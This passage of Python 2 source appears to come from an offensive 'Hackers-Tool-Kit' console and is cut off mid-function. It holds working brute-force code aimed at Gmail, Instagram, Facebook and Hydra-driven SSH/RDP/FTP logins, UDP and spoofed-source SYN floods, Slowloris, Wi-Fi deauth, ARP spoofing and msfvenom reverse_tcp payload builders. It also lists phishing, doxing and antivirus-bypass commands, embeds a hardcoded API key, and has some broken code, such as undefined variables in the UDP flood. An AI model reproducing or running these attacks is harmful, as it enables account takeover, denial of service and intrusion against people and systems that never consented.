██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal Hackers-Tool-Kit +arpspoof: arp spoofing | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +terminal: open another new terminal +source : get source code from a website +dirscan : web directory scanner / bruteforce +aserver : start a apache server +run : run a file +phpload : make a php reverse_tcp payload and start it in a multi handler +pyload : make a python reverse_tcp payload and start it in a multi handler +foxhis : gather firefox history from privileged javascript shell +rhawk : run the RED_HAWK script (info gathering tool) +nano : open nano text editor +\033[91m---------------------------------------------------------------------------------\033[0m + """ +#-----------------# +#HELP BANNER END# + + +#WINDOWS REVERSE TCP PAYLOAD START# +#---------------------------------# +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#WINDOWS REVERSE TCP PAYLOAD END# + + +#ANDROID REVERSE TCP PAYLOAD START# +#---------------------------------# +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#ANDROID REVERSE TCP PAYLOAD END# + +#GMAIL BRUTEFORCE START# +#----------------------# +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +#--------------------# +#GMAIL BRUTEFORCE END# + +#PORT SCAN START# +#---------------# +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +#-------------# +#PORT SCAN END# + +#INSTAGRAM BRUTEFORCE START# +#--------------------------# +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +#------------------------# +#INSTAGRAM BRUTEFORCE END# + +#FACEBOOK BRUTEFORCE START# +#-------------------------# +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +#-----------------------# +#FACEBOOK BRUTEFORCE END# + +#HOST TO IP START# +#----------------# +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +#--------------# +#HOST TO IP END# + +#YOUR OWN IP START# +#-----------------# +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" +#---------------# +#YOUR OWN IP END# + + +#AUTOMATED WIFI HACK START# +#-------------------------# +def wifite(): + os.system("wifite") +#-----------------------# +#AUTOMATED WIFI HACK END# + + +#MONITOR MODE START# +#------------------# +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +#----------------# +#MONITOR MODE END# + + +#DEVICES IN THE NET START# +#------------------------# +def netdev(): + os.system("netdiscover") +#----------------------# +#DEVICES IN THE NET END# + + +#NETS AROUND YOU START# +#-----------------------# +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +#---------------------# +#NETS AROUND YOU END# + + +#INFO SCAN HOST START# +#--------------------# +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +#------------------# +#INFO SCAN HOST END# + + +#INFO ON YOUR SYSTEM START# +#-------------------------# +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) +#-----------------------# +#INFO ON YOUR SYSTEM END# + + +#ALL METASPLOIT EXPLOITS START# +#-----------------------------# +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +#---------------------------# +#ALL METASPLOIT EXPLOITS END# + + +#UDP DOS START# +#-------------# +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +#-----------# +#UDP DOS END# + +#TCP FLOOD START# +#---------------# +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +#-------------# +#TCP FLOOD END# + + +#SYN FLOOD START# +#---------------# +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() +#-------------# +#SYN FLOOD END# + + +#PING A HOST START# +#-----------------# +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +#---------------# +#PING A HOST END# + + +#ALL METASPLOIT PAYLOADS START# +#-----------------------------# +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +#---------------------------# +#ALL METASPLOIT PAYLOADS END# + + +#ALL METASPLOIT AUX START# +#------------------------# +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +#----------------------# +#ALL METASPLOIT AUX END# + + +#START METASPLOIT HANDLER START# +#------------------------------# +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +#----------------------------# +#START METASPLOIT HANDLER END# + + +#ALL METASPLOIT MODS START# +#-------------------------# +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +#-----------------------# +#ALL METASPLOIT MODS END# + + +#HYDRA AUTOMATED START# +#---------------------# +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +#-------------------# +#HYDRA AUTOMATED END# + + +#WORDLIST MAKER START# +#--------------------# +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +#------------------# +#WORDLIST MAKER END# + + +#LIST FILES START# +#----------------# +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" +#--------------# +#LIST FILES END# + + +#MONITOR MODE OFF START# +#----------------------# +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +#--------------------# +#MONITOR MODE OFF END# + + +#TURN ON VPN START# +#-----------------# +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +#---------------# +#TURN ON VPN END# + + +#TURN OFF VPN START# +#------------------# +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +#----------------# +#TURN OFF VPN END# + + +#SLOW LORIS DOS START# +#--------------------# +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') +#------------------# +#SLOW LORIS DOS END# + + +#OPEN DOX WEBSITE START# +#----------------------# +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +#--------------------# +#OPEN DOX WEBSITE END# + + +#SCAN SPECIFIC NET START# +#-----------------------# +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +#---------------------# +#SCAN SPECIFIC NET END# + + +#DEFAULT WIFI PIN START# +#----------------------# +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +#--------------------# +#DEFAULT WIFI PIN END# + + +#WIFI PIN BRUTEFORCE START# +#-------------------------# +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +#-----------------------# +#WIFI PIN BRUTEFORCE END# + + +#DEAUTH ATTACK START# +#-------------------# +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +#-----------------# +#DEAUTH ATTACK END# + + +#MAC CHANGER START# +#-----------------# +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-----------------# +#MAC CHANGER START# + + +#MAC CHANGER OFF START# +#---------------------# +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-------------------# +#MAC CHANGER OFF END# + + +#ARP SPOOF START# +#---------------# +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("Targets: ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") +#-------------# +#ARP SPOOF END# + + +#SSL SCAN START# +#--------------# +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +#------------# +#SSL SCAN END# + + +#MAKE A PAYLOAD START# +#--------------------# +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + print "\nExamples: py, php, exe\n" + s = raw_input("File Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) + os.system(a) +#------------------# +#MAKE A PAYLOAD END# + + +#WORDLIST MAKER START# +#--------------------# +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +#------------------# +#WORDLIST MAKER END# + + +#INTERNET TRAFFIC START# +#----------------------# +def traff(): + os.system("iwconfig") + s = raw_input("Select 